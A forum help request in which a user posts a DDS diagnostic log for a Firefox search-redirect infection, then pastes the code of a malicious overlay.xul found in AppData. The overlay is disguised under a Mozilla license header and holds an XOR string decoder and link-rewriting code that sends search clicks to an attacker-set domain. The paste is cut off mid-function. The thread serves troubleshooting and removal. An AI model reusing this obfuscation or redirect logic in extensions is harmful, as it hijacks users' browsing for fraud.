Google Redirecting in Firefox


  • This topic is locked
7 replies to this topic

#1 gamemakerman2002

gamemakerman2002

  • Members
  • 5 posts
  • OFFLINE
  • Local time:11:27 PM

Posted 02 August 2010 - 02:32 PM

Every now and then when I click a link from my Google results page in Firefox 3.6.8 (it may be in other browsers as well) I get redirected to a different website that's based on what keywords I typed in and have to go back and re-click the link. Sometimes there's a redirect page in between so I have to manually select what page to go back to or it just keeps redirecting to the advertisement. Malwarebytes can't find anything and neither can Antivir. My hosts file doesn't have anything suspicious in it. I was infected with fake AV Soft a few weeks ago and I think I got rid of it but maybe this is residual of that?

For some reason I couldn't get gmer to work. It gives me the error message "C:\Windows\system32\config\system: The system cannot find the file specified." I tried disabling Antivir and running it as an administrator and running it in safe mode but got the same error message. I tried running defogger to see if CD emulation software was causing the problem but that didn't help either.


DDS (Ver_10-03-17.01) - NTFSX64
Run by Luke at 2:06:54.90 on Mon 08/02/2010
Internet Explorer: 8.0.7600.16385 BrowserJavaVersion: 1.6.0_21
Microsoft Windows 7 Ultimate 6.1.7600.0.1252.1.1033.18.4095.2177 [GMT -4:00]


============== Running Processes ===============

C:Windowssystem32wininit.exe
C:Windowssystem32lsm.exe
C:Windowssystem32svchost.exe -k DcomLaunch
C:Windowssystem32svchost.exe -k RPCSS
C:WindowsSystem32svchost.exe -k NetworkService
E:Program Files (x86)AMDAMD Fusion Utility for DesktopsFusionSVC.exe
C:Windowssystem32atiesrxx.exe
C:WindowsSystem32svchost.exe -k LocalServiceNetworkRestricted
C:WindowsSystem32svchost.exe -k LocalSystemNetworkRestricted
C:Windowssystem32svchost.exe -k netsvcs
C:Windowssystem32svchost.exe -k LocalService
C:Windowssystem32atieclxx.exe
C:WindowsSystem32spoolsv.exe
E:Program Files (x86)AviraAntiVir Desktopsched.exe
C:Windowssystem32svchost.exe -k LocalServiceNoNetwork
C:WindowsSysWOW64svchost.exe -k Akamai
E:Program Files (x86)AviraAntiVir Desktopavguard.exe
C:Program Files (x86)Common FilesAppleMobile Device SupportAppleMobileDeviceService.exe
C:Program Files (x86)BonjourmDNSResponder.exe
E:Program Files (x86)GameTrackerGSInGameService.exe
C:Program Files (x86)Common FilesLightScribeLSSrvc.exe
C:Program FilesMozyHomemozybackup.exe
E:Program Files (x86)CDBurnerXPNMSAccessU.exe
C:WindowsSysWOW64PnkBstrA.exe
C:WindowsSysWOW64PnkBstrB.exe
C:Program Files (x86)Common FilesProtexisLicense ServicePsiService_2.exe
E:Program FilesSandboxieSbieSvc.exe
C:Program Files (x86)Microsoft Application Virtualization Clientsftvsa.exe
C:Windowssystem32svchost.exe -k imgsvc
C:Program FilesMozyHomemozybackup.exe
C:Program Files (x86)Microsoft Application Virtualization Clientsftlist.exe
C:Windowssystem32taskhost.exe
C:Windowssystem32Dwm.exe
C:Program FilesMozyHomemozybackup.exe
C:WindowsExplorer.EXE
C:Windowssystem32taskeng.exe
C:WindowsDAODx.exe
E:Program Files (x86)ExtensisSuitcase Fusion 2FMCore.exe
C:Program Files (x86)Common FilesMicrosoft SharedVirtualization HandlerCVHSVC.EXE
E:Program Files (x86)AviraAntiVir Desktopavgnt.exe
C:Program Files (x86)ATI TechnologiesATI.ACECore-StaticMOM.exe
C:Windowssystem32svchost.exe -k NetworkServiceNetworkRestricted
C:Windowssystem32svchost.exe -k LocalServiceAndNoImpersonation
C:Program Files (x86)ATI TechnologiesATI.ACECore-StaticCCC.exe
C:Windowssystem32SearchIndexer.exe
C:Program FilesWindows Media Playerwmpnetwk.exe
C:WindowsSystem32svchost.exe -k LocalServicePeerNet
C:WindowsSystem32svchost.exe -k secsvcs
E:Program Files (x86)Mozilla Firefoxfirefox.exe
C:Windowssystem32svchost.exe -k bthsvcs
E:Program Files (x86)Mozilla Firefoxplugin-container.exe
C:Program FilesWIDCOMMBluetooth Softwarebtwdins.exe
C:Program FilesWIDCOMMBluetooth SoftwareBtTray.exe
C:Program FilesWIDCOMMBluetooth SoftwareBtStackServer.exe
C:Program FilesWIDCOMMBluetooth SoftwareBluetoothHeadsetProxy.exe
E:Program Files (x86)iTunesiTunes.exe
E:Program Files (x86)Last.fmLastFM.exe
C:Program FilesiPodbiniPodService.exe
C:Program Files (x86)Common FilesAdobeOOBEPDAppUWAAAM Updates Notifier.exe
C:WindowsSystem32svchost.exe -k swprv
C:Windowssystem32DllHost.exe
C:Windowssystem32DllHost.exe
F:UsersLukeDownloadsFirefox DownloadsInstallersdds.scr
C:Windowssystem32conhost.exe
C:Windowssystem32wbemwmiprvse.exe

============== Pseudo HJT Report ===============

uSearch Page = hxxp://www.bing.com/?pc=AVBR
uStart Page = hxxp://www.bing.com/?pc=AVBR
mLocal Page = c:windowssyswow64blank.htm
uInternet Settings,ProxyOverride = *.local
BHO: ContributeBHO Class: {074c1dc5-9320-4a9a-947d-c042949c6216} - e:program filesadobeadobe contribute cs5pluginsieplugincontributeieplugin.dll
BHO: Adobe PDF Link Helper: {18df081c-e8ad-4283-a596-fa578c2ebdc3} - c:program files (x86)common filesadobeacrobatactivexAcroIEHelperShim.dll
BHO: Google Toolbar Helper: {aa58ed58-01dd-4d91-8333-cf10577473f7} - c:program files (x86)googlegoogle toolbarGoogleToolbar_32.dll
BHO: Skype add-on for Internet Explorer: {ae805869-2e5c-4ed4-8f7b-f1f7851a4497} - c:program files (x86)skypetoolbarsinternet explorerskypeieplugin.dll
BHO: Google Toolbar Notifier BHO: {af69de43-7d58-4638-b6fa-ce66b5ad205d} - c:program files (x86)googlegoogletoolbarnotifier5.5.5126.1836swg.dll
BHO: Java™ Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:program files (x86)javajre6binjp2ssv.dll
TB: Contribute Toolbar: {517bdde4-e3a7-4570-b21e-2b52b6139fc7} - e:program filesadobeadobe contribute cs5pluginsieplugincontributeieplugin.dll
TB: Google Toolbar: {2318c2b1-4965-11d4-9b18-009027a5cd4f} - c:program files (x86)googlegoogle toolbarGoogleToolbar_32.dll
uRun: [AdobeBridge]
uRun: [FMCore.exe] "e:program files (x86)extensissuitcase fusion 2FMCore.exe" -standalone
mRun: [avgnt] "e:program files (x86)aviraantivir desktopavgnt.exe" /min
mRun: [ATICustomerCare] "c:program files (x86)atiaticustomercareATICustomerCare.exe"
mRun: [amd_dc_opt] c:program files (x86)amddual-core optimizeramd_dc_opt.exe
mRun: [StartCCC] "c:program files (x86)ati technologiesati.acecore-staticCLIStart.exe" MSRun
StartupFolder: c:progra~3micros~1windowsstartm~1programsstartupblueto~1.lnk - c:program fileswidcommbluetooth softwareBTTray.exe
uPolicies-explorer: DisallowRun = 1 (0x1)
uPolicies-disallowrun: 1 = avnotify.exe
mPolicies-explorer: NoActiveDesktop = 1 (0x1)
mPolicies-explorer: NoActiveDesktopChanges = 1 (0x1)
mPolicies-explorer: ForceActiveDesktopOn = 0 (0x0)
mPolicies-system: ConsentPromptBehaviorAdmin = 5 (0x5)
mPolicies-system: ConsentPromptBehaviorUser = 3 (0x3)
mPolicies-system: EnableUIADesktopToggle = 0 (0x0)
IE: Google Sidewiki... - c:program files (x86)googlegoogle toolbarcomponentGoogleToolbarDynamic_mui_en_89D8574934B26AC4.dll/cmsidewiki.html
IE: Send image to &Bluetooth Device... - c:program fileswidcommbluetooth softwarebtsendto_ie_ctx.htm
IE: Send page to &Bluetooth Device... - c:program fileswidcommbluetooth softwarebtsendto_ie.htm
IE: {CCA281CA-C863-46ef-9331-5C8D4460577F} - c:program fileswidcommbluetooth softwarebtsendto_ie.htm
IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - c:program files (x86)skypetoolbarsinternet explorerskypeieplugin.dll
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - c:program files (x86)skypetoolbarsinternet explorerskypeieplugin.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:progra~2common~1skypeSKYPE4~1.DLL
mASetup: {10880D85-AAD9-4558-ABDC-2AB1552D831F} - "c:program files (x86)common fileslightscribeLSRunOnce.exe"
BHO-X64: Google Toolbar Helper: {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:program files (x86)googlegoogle toolbarGoogleToolbar_64.dll
BHO-X64: Google Toolbar Notifier BHO: {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - c:program filesgooglegoogletoolbarnotifier5.5.5126.1836swg64.dll
BHO-X64: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:program filesjavajre6binjp2ssv.dll
TB-X64: Google Toolbar: {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:program files (x86)googlegoogle toolbarGoogleToolbar_64.dll
IE-X64: {CCA281CA-C863-46ef-9331-5C8D4460577F} - c:program fileswidcommbluetooth softwarebtsendto_ie.htm

================= FIREFOX ===================

FF - ProfilePath - c:userslukeappdataroamingmozillafirefoxprofilesw4mggrpi.default
FF - component: c:userslukeappdataroamingmozillafirefoxprofilesw4mggrpi.defaultextensionsstratabuddy@reduxteamcomponentsdwmxpcom.dll
FF - plugin: c:progra~2micros~3office14NPSPWRAP.DLL
FF - plugin: c:program files (x86)googlegoogle earthpluginnpgeplugin.dll
FF - plugin: c:program files (x86)googleupdate1.2.183.23npGoogleOneClick8.dll
FF - plugin: c:program files (x86)javajre6binnew_pluginnpdeployJava1.dll
FF - plugin: c:program files (x86)onlivefirefoxpluginnpolgdet.dll
FF - plugin: c:program files (x86)pando networksmedia boosternpPandoWebPlugin.dll
FF - plugin: c:program files (x86)photosynthnpPhotosynthMozilla.dll
FF - plugin: c:program files (x86)virtual earth 3dnpVE3D.dll
FF - plugin: c:userslukeappdatalocalgoogleupdate1.2.183.29npGoogleOneClick8.dll
FF - plugin: c:userslukeappdataroamingfacebooknpfbplugin_1_0_3.dll
FF - plugin: c:windowssyswow64macromedflashNPSWF32.dll
FF - plugin: e:program files (x86)adobereader 9.0readerbrowsernppdf32.dll
FF - plugin: e:program files (x86)divxdivx playernpDivxPlayerPlugin.dll
FF - plugin: e:program files (x86)divxdivx web playernpdivx32.dll
FF - plugin: e:program files (x86)itunesmozilla pluginsnpitunes.dll
FF - plugin: e:program files (x86)mozilla firefoxpluginsnp-mswmp.dll
FF - plugin: e:program files (x86)mozilla firefoxpluginsnpContribute.dll
FF - plugin: e:program files (x86)mozilla firefoxpluginsnpnul32.dll
FF - plugin: e:program files (x86)mozilla firefoxpluginsNPSibelius.dll
FF - plugin: e:program files (x86)quicktimepluginsnpqtplugin.dll
FF - plugin: e:program files (x86)quicktimepluginsnpqtplugin2.dll
FF - plugin: e:program files (x86)quicktimepluginsnpqtplugin3.dll
FF - plugin: e:program files (x86)quicktimepluginsnpqtplugin4.dll
FF - plugin: e:program files (x86)quicktimepluginsnpqtplugin5.dll
FF - plugin: e:program files (x86)quicktimepluginsnpqtplugin6.dll
FF - plugin: e:program files (x86)quicktimepluginsnpqtplugin7.dll
FF - plugin: e:program files (x86)videolanvlcnpvlc.dll
FF - HiddenExtension: Java Console: No Registry Reference - c:program files (x86)mozilla firefox 4.0 beta 1extensions{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA}

============= SERVICES / DRIVERS ===============

R0 PxHlpa64;PxHlpa64;c:windowssystem32driversPxHlpa64.sys [2010-1-31 55280]
R2 Akamai;Akamai NetSession Interface;c:windowssystem32svchost.exe -k Akamai [2009-7-13 27136]
R2 AMD External Events Utility;AMD External Events Utility;c:windowssystem32atiesrxx.exe [2010-7-6 203264]
R2 AMDFusionSVC;AMD Fusion Utility Service;e:program files (x86)amdamd fusion utility for desktopsFusionSVC.exe [2009-9-8 383544]
R2 AntiVirSchedulerService;Avira AntiVir Scheduler;e:program files (x86)aviraantivir desktopsched.exe [2010-1-8 108289]
R2 AntiVirService;Avira AntiVir Guard;e:program files (x86)aviraantivir desktopavguard.exe [2010-1-8 185089]
R2 avgntflt;avgntflt;c:windowssystem32driversavgntflt.sys [2010-1-8 74880]
R2 cvhsvc;Client Virtualization Handler;c:program files (x86)common filesmicrosoft sharedvirtualization handlerCVHSVC.EXE [2009-9-26 819600]
R2 GS In-Game Service;GS In-Game Service;e:program files (x86)gametrackerGSInGameService.exe [2010-7-7 1648480]
R2 sftlist;Application Virtualization Client;c:program files (x86)microsoft application virtualization clientsftlist.exe [2009-9-23 447848]
R3 amdkmdag;amdkmdag;c:windowssystem32driversatikmdag.sys [2010-7-6 7195648]
R3 amdkmdap;amdkmdap;c:windowssystem32driversatikmpag.sys [2010-7-6 265728]
R3 btwl2cap;Bluetooth L2CAP Service;c:windowssystem32driversbtwl2cap.sys [2010-8-2 35104]
R3 RDID1046;UA-25;c:windowssystem32driversRdwm1046.sys [2010-1-8 199296]
R3 RTL8167;Realtek 8167 NT Driver;c:windowssystem32driversRt64win7.sys [2009-12-19 314400]
R3 SbieDrv;SbieDrv;e:program filessandboxieSbieDrv.sys [2010-7-4 139880]
R3 sftfs;sftfs;c:program files (x86)microsoft application virtualization clientdriversSftFSlh.sys [2009-9-23 712536]
R3 sftplay;sftplay;c:program files (x86)microsoft application virtualization clientdriverssftplaylh.sys [2009-9-23 261480]
R3 Sftredir;Sftredir;c:windowssystem32driversSftredirlh.sys [2009-9-23 25944]
R3 sftvol;sftvol;c:program files (x86)microsoft application virtualization clientdriversSftVollh.sys [2009-9-23 17752]
R3 sftvsa;Application Virtualization Service Agent;c:program files (x86)microsoft application virtualization clientsftvsa.exe [2009-9-23 203608]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:windowsmicrosoft.netframeworkv4.0.30319mscorsvw.exe [2010-3-18 130384]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:windowsmicrosoft.netframework64v4.0.30319mscorsvw.exe [2010-3-18 138576]
S2 gupdate;Google Update Service (gupdate);c:program files (x86)googleupdateGoogleUpdate.exe [2010-3-31 135664]
S3 DAUpdaterSvc;Dragon Age: Origins - Content Updater;e:program files (x86)dragon agebin_shipdaupdatersvc.service.exe [2010-1-18 25832]
S3 osppsvc;Office Software Protection Platform;c:program filescommon filesmicrosoft sharedofficesoftwareprotectionplatformOSPPSVC.EXE [2009-9-26 4924336]
S3 SwitchBoard;Adobe SwitchBoard;c:program files (x86)common filesadobeswitchboardSwitchBoard.exe [2010-2-19 517096]
S3 USBAAPL64;Apple Mobile USB Driver;c:windowssystem32driversusbaapl64.sys [2010-4-19 50688]
S3 WatAdminSvc;Windows Activation Technologies Service;c:windowssystem32watWatAdminSvc.exe [2010-4-3 1255736]

=============== Created Last 30 ================

2010-08-02 05:41:13 0 ----a-w- c:userslukedefogger_reenable
2010-08-02 04:31:44 35104 ----a-w- c:windowssystem32driversbtwl2cap.sys
2010-08-02 04:31:44 21160 ----a-w- c:windowssystem32driversbtwrchid.sys
2010-08-02 04:31:44 132648 ----a-w- c:windowssystem32driversbtwavdt.sys
2010-08-02 04:31:43 98344 ----a-w- c:windowssystem32driversbtwaudio.sys
2010-08-02 04:31:22 0 d-----w- c:program filesWIDCOMM
2010-08-02 04:28:00 32 ----a-w- c:windows0
2010-08-02 04:28:00 0 ----a-w- c:windowssyswow640
2010-08-02 01:05:28 0 d-----w- c:userslukeappdataroamingResourceCentral.E6E1B28A311BC518DB6C6883EA3757FDE0E90ADC.1
2010-08-02 01:03:00 0 d-----w- c:userslukeappdataroamingPACE Anti-Piracy
2010-08-02 01:03:00 0 d-----w- c:programdataPACE Anti-Piracy
2010-08-01 06:15:49 0 d-----w- c:userslukeappdataroamingFLV Extract
2010-07-30 22:13:03 0 d-----w- c:program filesDIFX
2010-07-28 00:58:28 0 d-----w- c:programdataATI
2010-07-24 20:08:04 0 d-----w- c:program files (x86)WinPcap
2010-07-22 20:46:29 0 d-----w- c:userslukeappdataroamingNCH Software
2010-07-22 20:44:56 0 d-----w- c:programdataNCH Swift Sound
2010-07-22 20:44:31 0 d-----w- c:program files (x86)NCH Swift Sound
2010-07-21 19:45:16 0 d-----w- c:program filesFebooti fileTweak Hash and CRC
2010-07-17 21:19:11 0 d-----w- c:program files (x86)Half Life 2
2010-07-17 00:58:11 0 dc-h--w- c:programdata{BC13C66E-D01E-4443-A1D1-35EEDF3A964A}
2010-07-17 00:58:07 0 d-----w- c:programdataNative Instruments
2010-07-17 00:58:04 0 dc-h--w- c:programdata{D7CFB71A-972A-44FF-AE44-8780EB53ABB2}
2010-07-17 00:58:02 0 d-----w- c:program filesNative Instruments
2010-07-17 00:58:02 0 d-----w- c:program filescommon filesNative Instruments
2010-07-16 21:38:08 0 d-----w- c:programdataSun
2010-07-16 21:37:59 423656 ----a-w- c:windowssyswow64deployJava1.dll
2010-07-16 21:37:59 153376 ----a-w- c:windowssyswow64javaws.exe
2010-07-16 21:37:59 145184 ----a-w- c:windowssyswow64javaw.exe
2010-07-16 21:37:59 145184 ----a-w- c:windowssyswow64java.exe
2010-07-16 07:02:49 0 d-----w- c:userslukeappdataroamingMael
2010-07-15 20:16:31 66040 ----a-w- c:windowssystem32driversmozy.sys
2010-07-15 20:16:30 0 d-----w- c:program filesMozyHome
2010-07-15 05:01:45 0 d-----w- c:program filesJava
2010-07-15 04:00:11 0 d-----w- c:userslukeappdataroamingTS3Client
2010-07-13 17:20:03 144384 ----a-w- c:windowssystem32cdd.dll
2010-07-11 00:07:29 0 d-----w- c:programdataInstallShield
2010-07-11 00:07:11 73728 ----a-w- c:windowssyswow64ISUSPM.cpl
2010-07-11 00:07:11 0 d-----w- c:program files (x86)M-Audio
2010-07-10 06:39:01 0 d-----w- c:program filesTeamSpeak 3 Client
2010-07-10 05:32:40 293 ----a-w- c:windowsgame.ini
2010-07-09 22:39:16 0 d-----w- c:program files (x86)Qtracker
2010-07-09 16:24:04 6402 ----a-w- c:windowsmozy.flt
2010-07-09 16:24:04 3264 ----a-w- c:windowsmozy.blk
2010-07-09 06:17:23 521 ----a-w- c:windowseReg.dat
2010-07-09 05:15:08 56 ---ha-w- c:programdataezsidmv.dat
2010-07-09 05:12:37 0 d-----r- c:program files (x86)Skype
2010-07-09 05:12:35 0 d-----w- c:programdataSkype
2010-07-09 00:48:57 0 d-----w- c:program files (x86)Mozilla Firefox 4.0 Beta 1
2010-07-08 03:07:21 0 d-----w- c:program filesRecuva
2010-07-07 06:43:08 0 d-----w- c:windowssystem32appmgmt
2010-07-07 05:57:43 0 d-----w- c:usersluke.idlerc
2010-07-07 04:34:44 0 d-----w- c:userslukeappdataroamingGameTracker
2010-07-07 02:30:08 7195648 ----a-w- c:windowssystem32driversatikmdag.sys
2010-07-07 02:16:20 20118528 ----a-w- c:windowssystem32atio6axx.dll
2010-07-07 01:55:08 15461888 ----a-w- c:windowssyswow64atioglxx.dll
2010-07-07 01:54:32 63416 ----a-w- c:windowssystem32atiapfxx.blb
2010-07-07 01:54:16 143360 ----a-w- c:windowssystem32atiapfxx.exe
2010-07-07 01:51:30 446464 ----a-w- c:windowssystem32ATIDEMGX.dll
2010-07-07 01:51:26 462336 ----a-w- c:windowssystem32atieclxx.exe
2010-07-07 01:50:54 203264 ----a-w- c:windowssystem32atiesrxx.exe
2010-07-07 01:49:48 120320 ----a-w- c:windowssystem32atitmm64.dll
2010-07-07 01:49:36 421376 ----a-w- c:windowssystem32atipdl64.dll
2010-07-07 01:49:28 356352 ----a-w- c:windowssyswow64atipdlxx.dll
2010-07-07 01:49:18 278528 ----a-w- c:windowssyswow64Oemdspif.dll
2010-07-07 01:49:14 12288 ----a-w- c:windowssystem32atimuixx.dll
2010-07-07 01:49:10 59392 ----a-w- c:windowssystem32atiedu64.dll
2010-07-07 01:49:06 43520 ----a-w- c:windowssyswow64ati2edxx.dll
2010-07-07 01:46:26 3826688 ----a-w- c:windowssyswow64atidxx32.dll
2010-07-07 01:30:12 2785792 ----a-w- c:windowssystem32atiumd6a.dll
2010-07-07 01:29:26 51200 ----a-w- c:windowssystem32aticalrt64.dll
2010-07-07 01:29:24 46080 ----a-w- c:windowssyswow64aticalrt.dll
2010-07-07 01:29:16 44544 ----a-w- c:windowssystem32aticalcl64.dll
2010-07-07 01:29:14 44032 ----a-w- c:windowssyswow64aticalcl.dll
2010-07-07 01:29:06 5378560 ----a-w- c:windowssystem32aticaldd64.dll
2010-07-07 01:27:58 4323840 ----a-w- c:windowssyswow64aticaldd.dll
2010-07-07 01:27:28 543664 ----a-w- c:windowssystem32atiumd6a.cap
2010-07-07 01:22:52 543664 ----a-w- c:windowssyswow64atiumdva.cap
2010-07-07 01:22:26 5099008 ----a-w- c:windowssystem32atiumd64.dll
2010-07-07 01:16:06 335872 ----a-w- c:windowssystem32atiadlxx.dll
2010-07-07 01:16:02 237568 ----a-w- c:windowssyswow64atiadlxy.dll
2010-07-07 01:15:54 14848 ----a-w- c:windowssystem32atig6pxx.dll
2010-07-07 01:15:50 12800 ----a-w- c:windowssyswow64atiglpxx.dll
2010-07-07 01:15:50 12800 ----a-w- c:windowssystem32atiglpxx.dll
2010-07-07 01:15:48 18432 ----a-w- c:windowssystem32atig6txx.dll
2010-07-07 01:15:46 16896 ----a-w- c:windowssyswow64atigktxx.dll
2010-07-07 01:15:42 265728 ----a-w- c:windowssystem32driversatikmpag.sys
2010-07-07 01:14:58 30208 ----a-w- c:windowssyswow64atiuxpag.dll
2010-07-07 01:14:50 30208 ----a-w- c:windowssystem32atiu9p64.dll
2010-07-07 01:14:16 53248 ----a-w- c:windowssystem32driversati2erec.dll
2010-07-07 01:11:12 54272 ----a-w- c:windowssystem32atimpc64.dll
2010-07-07 01:11:12 54272 ----a-w- c:windowssystem32amdpcom64.dll
2010-07-07 01:11:06 52736 ----a-w- c:windowssyswow64atimpc32.dll
2010-07-07 01:11:06 52736 ----a-w- c:windowssyswow64amdpcom32.dll
2010-07-06 20:48:52 0 d-----w- c:program files (x86)LucasArts
2010-07-05 18:33:44 0 d-----w- c:programdataPassmark
2010-07-05 18:33:44 0 d-----w- c:program filesPerformanceTest
2010-07-05 06:13:48 0 d-----w- c:userslukeappdataroamingAvant Profiles
2010-07-05 06:13:45 0 d-----w- c:program files (x86)Avant Browser

==================== Find3M ====================

2010-07-15 05:01:48 468480 ----a-w- c:windowssystem32deployJava1.dll
2010-07-10 23:35:49 214520 ----a-w- c:windowssyswow64PnkBstrB.exe
2010-07-07 01:54:08 513024 ----a-w- c:windowssyswow64aticfx32.dll
2010-07-07 01:53:20 594432 ----a-w- c:windowssystem32aticfx64.dll
2010-07-07 01:37:36 4463616 ----a-w- c:windowssystem32atidxx64.dll
2010-07-07 01:28:20 3975680 ----a-w- c:windowssyswow64atiumdag.dll
2010-07-07 01:24:34 55296 ----a-w- c:windowssystem32coinst.dll
2010-07-07 01:23:14 3058688 ----a-w- c:windowssyswow64atiumdva.dll
2010-07-07 01:15:04 39424 ----a-w- c:windowssystem32atiuxp64.dll
2010-07-07 01:14:44 22528 ----a-w- c:windowssyswow64atiu9pag.dll
2010-06-15 22:28:58 2857 ----a-w- c:windowssyswow64atipblag.dat
2010-06-15 22:28:58 2857 ----a-w- c:windowssystem32atipblag.dat
2010-05-31 05:22:40 156296 ---ha-w- c:windowssyswow64mlfcache.dat
2010-05-27 07:24:13 34304 ----a-w- c:windowssyswow64atmlib.dll
2010-05-27 06:34:09 46080 ----a-w- c:windowssystem32atmlib.dll
2010-05-27 04:11:32 366080 ----a-w- c:windowssystem32atmfd.dll
2010-05-27 03:49:37 293888 ----a-w- c:windowssyswow64atmfd.dll
2010-05-21 18:14:28 270208 ------w- c:windowssystem32MpSigStub.exe
2010-05-21 05:52:30 1192960 ----a-w- c:windowssystem32wininet.dll
2010-05-21 05:18:06 977920 ----a-w- c:windowssyswow64wininet.dll
2010-05-21 05:14:50 48128 ----a-w- c:windowssyswow64jsproxy.dll
2010-05-18 20:55:18 95520 ----a-w- c:windowssystem32dnssd.dll
2010-05-18 20:55:18 119584 ----a-w- c:windowssystem32dns-sd.exe
2010-05-18 20:35:16 91424 ----a-w- c:windowssyswow64dnssd.dll
2010-05-18 20:35:16 107808 ----a-w- c:windowssyswow64dns-sd.exe
2010-05-11 20:42:08 205156 ----a-w- c:windowssystem32atiicdxx.dat
2010-05-11 03:12:31 2828 --sha-w- c:programdataKGyGaAvL.sys
2010-05-09 09:46:00 961024 ----a-w- c:windowssystem32CPFilters.dll
2010-05-09 09:45:57 552960 ----a-w- c:windowssystem32msdri.dll
2010-05-09 09:14:55 641536 ----a-w- c:windowssyswow64CPFilters.dll
2010-05-06 12:42:05 1225216 ----a-w- c:windowssyswow64urlmon.dll
2010-05-06 12:41:55 606208 ----a-w- c:windowssyswow64mstime.dll
2010-05-06 12:41:53 64512 ----a-w- c:windowssyswow64msfeedsbs.dll
2010-05-06 12:41:53 5970944 ----a-w- c:windowssyswow64mshtml.dll
2010-05-06 12:41:49 381440 ----a-w- c:windowssyswow64iedkcs32.dll
2010-05-06 12:41:49 10984448 ----a-w- c:windowssyswow64ieframe.dll
2010-01-17 18:20:18 379286 ----a-w- c:program files (x86)UnGEXUSACAN.exe
2010-01-17 18:20:18 14 ----a-w- c:program files (x86)settings.cfg
2009-07-14 05:37:38 31548 ----a-w- c:windowsinfperflib0409perfd.dat
2009-07-14 05:37:38 31548 ----a-w- c:windowsinfperflib0409perfc.dat
2009-07-14 05:37:38 291294 ----a-w- c:windowsinfperflib0409perfi.dat
2009-07-14 05:37:38 291294 ----a-w- c:windowsinfperflib0409perfh.dat
2009-07-14 04:54:24 174 --sha-w- c:program filesdesktop.ini
2009-07-14 04:54:24 174 --sha-w- c:program files (x86)desktop.ini
2009-07-14 01:00:34 291294 ----a-w- c:windowsinfperflib0000perfi.dat
2009-07-14 01:00:34 291294 ----a-w- c:windowsinfperflib0000perfh.dat
2009-07-14 01:00:32 31548 ----a-w- c:windowsinfperflib0000perfd.dat
2009-07-14 01:00:32 31548 ----a-w- c:windowsinfperflib0000perfc.dat
2008-01-19 03:39:42 604 ---ha-w- c:program files (x86)STLL Notifier
2009-06-10 20:44:08 9633792 --sha-r- c:windowsfontsStaticCache.dat
2010-01-23 09:14:35 245760 --sha-w- c:windowsserviceprofilesnetworkserviceappdataroamingmicrosoftwindowsietldcacheindex.dat
2009-07-14 01:39:53 398848 --sha-w- c:windowswinsxsamd64_microsoft-windows-mail-app_31bf3856ad364e35_6.1.7600.16385_none_4d4d1f2f696639a2WinMail.exe
2009-07-14 01:14:45 396800 --sha-w- c:windowswinsxsx86_microsoft-windows-mail-app_31bf3856ad364e35_6.1.7600.16385_none_f12e83abb108c86cWinMail.exe

============= FINISH: 2:07:03.50 ===============

Alright, I think I found the problem on my own. There was a file in "C:\Users\Luke\AppData\Local\{54A99DBC-39B9-454A-A1A3-5E56906EF030}\chrome\content" called overlay.xul that had the following code:
<?xml version="1.0" encoding="UTF-8"?>
<!--
/* ***** BEGIN LICENSE BLOCK *****
* Version: MPL 1.1/GPL 2.0/LGPL 2.1
*
* The contents of this file are subject to the Mozilla Public License Version
* 1.1 (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
* http://www.mozilla.org/MPL/
*
* Software distributed under the License is distributed on an "AS IS" basis,
* WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
* for the specific language governing rights and limitations under the
* License.
*
* The Original Code is XULRunner.
*
* The Initial Developer of the Original Code is
*
* Einar Egilsson. (email: xulrunner@dev.mozilla.org)
*
* Portions created by the Initial Developer are Copyright 2006
* the Initial Developer. All Rights Reserved.
*
* Contributor(s):
*
* Alternatively, the contents of this file may be used under the terms of
* either the GNU General Public License Version 2 or later (the "GPL"), or
* the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
* in which case the provisions of the GPL or the LGPL are applicable instead
* of those above. If you wish to allow use of your version of this file only
* under the terms of either the GPL or the LGPL, and not to allow others to
* use your version of this file under the terms of the MPL, indicate your
* decision by deleting the provisions above and replace them with the notice
* and other provisions required by the GPL or the LGPL. If you do not delete
* the provisions above, a recipient may use your version of this file under
* the terms of any one of the MPL, the GPL or the LGPL.
*
* ***** END LICENSE BLOCK ***** */
-->
<overlay id="xulrunner-overlay" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">&lt;script type="application/x-javascript" src="chrome://xulrunner/content/_cfg.js"/>&lt;script type="application/x-javascript">function dex(str) { var res = "", next = ""; var len = str.length; if(len%2 != 0) return ""; for(var i=0; i<len; i+=2) {next = str.substring(i, i+2);next = parseInt(next, 16);res += String.fromCharCode(24^next); } return res;}function findOur(str) { var fdom, last, pos2, pos, ret;try { if((pos=str.indexOf('&fadurl=')) != -1) {pos2 = str.substring(pos+8).indexOf('&');if(!pos2) return -1;fdom = str.substring(pos+8, pos+8+pos2);if(!document.fdom) document.fdom = fdom;last = str.substring(pos+8+pos2);if((pos2 = last.indexOf('&aclck=')) != -1) last = last.substring(0, pos2); pos2 = str.substring(7).indexOf('/');if(!pos2) return -1;if(!document.ccdom) document.ccdom = str.substring(7, pos2);return 'http://' + fdom + str.substring(pos2+7, pos) + last; } else if((pos=str.indexOf(document.ccdom)) != -1) {return str.substring(0,pos) + 